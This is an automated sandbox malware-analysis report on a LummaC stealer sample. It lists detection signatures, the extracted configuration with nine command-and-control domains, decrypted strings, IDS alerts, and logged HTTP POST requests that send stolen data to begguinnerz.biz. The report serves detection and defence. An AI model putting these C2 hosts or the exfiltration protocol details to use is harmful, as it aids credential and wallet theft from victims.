Edit tour

Windows Analysis Report
yTcaknrrb8.exe

Overview

General Information

Sample name:	yTcaknrrb8.exe renamed because original name is a hash value
Original sample name:	617e7bf260aa05530b1470c129a4a164.exe
Analysis ID:	1583038
MD5:	617e7bf260aa05530b1470c129a4a164
SHA1:	bf605cfa0502ca6563dac9989a2b934cd018928a
SHA256:	ba4791282afac0d30759490693ac7ee8c5934c98262ffbb8d7b993d095e34bf8
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

yTcaknrrb8.exe (PID: 2436 cmdline: "C:\Users\user\Desktop\yTcaknrrb8.exe" MD5: 617E7BF260AA05530B1470C129A4A164)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["begguinnerz.biz", "hummskitnj.buzz", "screwamusresz.buzz", "cashfuzysao.buzz", "inherineau.buzz", "scentniej.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "appliacnesot.buzz"], "Build id": "HpOoIh--dd6d33cfe0a0"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.3079776447.0000000001D3F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.3103534019.0000000001D42000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.3090277095.0000000001D3F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.3079860899.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.3079992709.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: yTcaknrrb8.exe PID: 2436	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: yTcaknrrb8.exe PID: 2436	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: yTcaknrrb8.exe PID: 2436	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 4 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T16:55:03.586357+0100	2028371	3	Unknown Traffic	192.168.2.7	49971	104.21.92.91	443	TCP
2025-01-01T16:55:04.675733+0100	2028371	3	Unknown Traffic	192.168.2.7	49972	104.21.92.91	443	TCP
2025-01-01T16:55:06.189173+0100	2028371	3	Unknown Traffic	192.168.2.7	49973	104.21.92.91	443	TCP
2025-01-01T16:55:07.322380+0100	2028371	3	Unknown Traffic	192.168.2.7	49974	104.21.92.91	443	TCP
2025-01-01T16:55:08.814491+0100	2028371	3	Unknown Traffic	192.168.2.7	49975	104.21.92.91	443	TCP
2025-01-01T16:55:10.422698+0100	2028371	3	Unknown Traffic	192.168.2.7	49976	104.21.92.91	443	TCP
2025-01-01T16:55:11.482596+0100	2028371	3	Unknown Traffic	192.168.2.7	49977	104.21.92.91	443	TCP
2025-01-01T16:55:12.804646+0100	2028371	3	Unknown Traffic	192.168.2.7	49978	104.21.92.91	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T16:55:04.055704+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49971	104.21.92.91	443	TCP
2025-01-01T16:55:05.423180+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49972	104.21.92.91	443	TCP
2025-01-01T16:55:13.235145+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49978	104.21.92.91	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T16:55:04.055704+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49971	104.21.92.91	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T16:55:05.423180+0100	2049812	1	A Network Trojan was detected	192.168.2.7	49972	104.21.92.91	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (begguinnerz .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T16:55:03.586357+0100	2058601	1	Domain Observed Used for C2 Detected	192.168.2.7	49971	104.21.92.91	443	TCP
2025-01-01T16:55:04.675733+0100	2058601	1	Domain Observed Used for C2 Detected	192.168.2.7	49972	104.21.92.91	443	TCP
2025-01-01T16:55:06.189173+0100	2058601	1	Domain Observed Used for C2 Detected	192.168.2.7	49973	104.21.92.91	443	TCP
2025-01-01T16:55:07.322380+0100	2058601	1	Domain Observed Used for C2 Detected	192.168.2.7	49974	104.21.92.91	443	TCP
2025-01-01T16:55:08.814491+0100	2058601	1	Domain Observed Used for C2 Detected	192.168.2.7	49975	104.21.92.91	443	TCP
2025-01-01T16:55:10.422698+0100	2058601	1	Domain Observed Used for C2 Detected	192.168.2.7	49976	104.21.92.91	443	TCP
2025-01-01T16:55:11.482596+0100	2058601	1	Domain Observed Used for C2 Detected	192.168.2.7	49977	104.21.92.91	443	TCP
2025-01-01T16:55:12.804646+0100	2058601	1	Domain Observed Used for C2 Detected	192.168.2.7	49978	104.21.92.91	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (begguinnerz .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T16:55:03.099386+0100	2058600	1	Domain Observed Used for C2 Detected	192.168.2.7	63966	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T16:55:06.717410+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.7	49973	104.21.92.91	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://begguinnerz.biz/	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/ves	Avira URL Cloud: Label: malware
Source: begguinnerz.biz	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz:443/apiocal	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz:443/apin.txtPK	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/gax	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/Z	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/pi	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/apix	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/api	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz:443/api	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["begguinnerz.biz", "hummskitnj.buzz", "screwamusresz.buzz", "cashfuzysao.buzz", "inherineau.buzz", "scentniej.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "appliacnesot.buzz"], "Build id": "HpOoIh--dd6d33cfe0a0"}

Multi AV Scanner detection for submitted file

Source: yTcaknrrb8.exe	ReversingLabs: Detection: 39%
Source: yTcaknrrb8.exe	Virustotal: Detection: 47%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 89.1% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: begguinnerz.biz
Source: 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: HpOoIh--dd6d33cfe0a0

Source: yTcaknrrb8.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.7:49971 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.7:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.7:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.7:49974 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.7:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.7:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.7:49977 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.7:49978 version: TLS 1.2

Source: yTcaknrrb8.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Admin\Workspace\1994844261\Project\Release\Project.pdb source: yTcaknrrb8.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058600 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (begguinnerz .biz) : 192.168.2.7:63966 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058601 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (begguinnerz .biz in TLS SNI) : 192.168.2.7:49976 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2058601 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (begguinnerz .biz in TLS SNI) : 192.168.2.7:49974 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2058601 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (begguinnerz .biz in TLS SNI) : 192.168.2.7:49972 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2058601 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (begguinnerz .biz in TLS SNI) : 192.168.2.7:49975 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2058601 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (begguinnerz .biz in TLS SNI) : 192.168.2.7:49978 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2058601 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (begguinnerz .biz in TLS SNI) : 192.168.2.7:49971 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2058601 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (begguinnerz .biz in TLS SNI) : 192.168.2.7:49977 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2058601 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (begguinnerz .biz in TLS SNI) : 192.168.2.7:49973 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49971 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49971 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49973 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49972 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49972 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49978 -> 104.21.92.91:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: begguinnerz.biz
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49974 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49972 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49976 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49975 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49978 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49971 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49977 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49973 -> 104.21.92.91:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Y44N968MN09AJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12821Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6HVU4IH9QFJAKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15053Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CZVFW84DU08ST1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20384Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=86Q6J6TMF3ERJ69User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1211Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9N0X5D913B6X79R1KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1114Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: begguinnerz.biz

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: begguinnerz.biz

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: begguinnerz.biz

Source: yTcaknrrb8.exe, 00000000.00000003.3063100244.0000000008B4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: yTcaknrrb8.exe, 00000000.00000003.3063100244.0000000008B4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: yTcaknrrb8.exe, 00000000.00000003.3063100244.0000000008B4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: yTcaknrrb8.exe, 00000000.00000003.3063100244.0000000008B4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: yTcaknrrb8.exe, 00000000.00000003.3063100244.0000000008B4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: yTcaknrrb8.exe, 00000000.00000003.3063100244.0000000008B4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: yTcaknrrb8.exe, 00000000.00000003.3063100244.0000000008B4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: yTcaknrrb8.exe, 00000000.00000003.3063100244.0000000008B4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: yTcaknrrb8.exe, 00000000.00000003.3063100244.0000000008B4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: yTcaknrrb8.exe, 00000000.00000003.3063100244.0000000008B4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: yTcaknrrb8.exe, 00000000.00000003.3063100244.0000000008B4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: yTcaknrrb8.exe, 00000000.00000003.3037067411.0000000008B5A000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036994395.0000000008B5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: yTcaknrrb8.exe, 00000000.00000003.3035962125.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3103760132.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036076109.0000000001CDB000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000002.3114571173.0000000001D5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/
Source: yTcaknrrb8.exe, 00000000.00000002.3114877720.0000000008B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/Z
Source: yTcaknrrb8.exe, 00000000.00000003.3103760132.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3035962125.0000000001CDA000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3035962125.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000002.3114514612.0000000001D4E000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3075474711.0000000008B15000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036076109.0000000001CDB000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000002.3114571173.0000000001D5E000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3090277095.0000000001D3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/api
Source: yTcaknrrb8.exe, 00000000.00000003.3090277095.0000000001D3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/apix
Source: yTcaknrrb8.exe, 00000000.00000003.3113352753.0000000001D42000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000002.3114514612.0000000001D42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/gax
Source: yTcaknrrb8.exe, 00000000.00000003.3113515917.0000000001D5E000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3090277095.0000000001D5E000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000002.3114571173.0000000001D5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/pi
Source: yTcaknrrb8.exe, 00000000.00000003.3103642301.0000000001D5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/ves
Source: yTcaknrrb8.exe, 00000000.00000003.3035962125.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz:443/api
Source: yTcaknrrb8.exe, 00000000.00000003.3090568585.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3103760132.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3113352753.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3080284956.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000002.3114349117.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3079860899.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz:443/apin.txtPK
Source: yTcaknrrb8.exe, 00000000.00000002.3114349117.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3079860899.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz:443/apiocal
Source: yTcaknrrb8.exe, 00000000.00000003.3037067411.0000000008B5A000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036994395.0000000008B5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: yTcaknrrb8.exe, 00000000.00000003.3037067411.0000000008B5A000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036994395.0000000008B5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: yTcaknrrb8.exe, 00000000.00000003.3037067411.0000000008B5A000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036994395.0000000008B5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: yTcaknrrb8.exe, 00000000.00000003.3037067411.0000000008B5A000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036994395.0000000008B5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: yTcaknrrb8.exe, 00000000.00000003.3037067411.0000000008B5A000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036994395.0000000008B5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: yTcaknrrb8.exe, 00000000.00000003.3037067411.0000000008B5A000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036994395.0000000008B5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: yTcaknrrb8.exe, 00000000.00000003.3064034608.0000000008C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: yTcaknrrb8.exe, 00000000.00000003.3064034608.0000000008C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
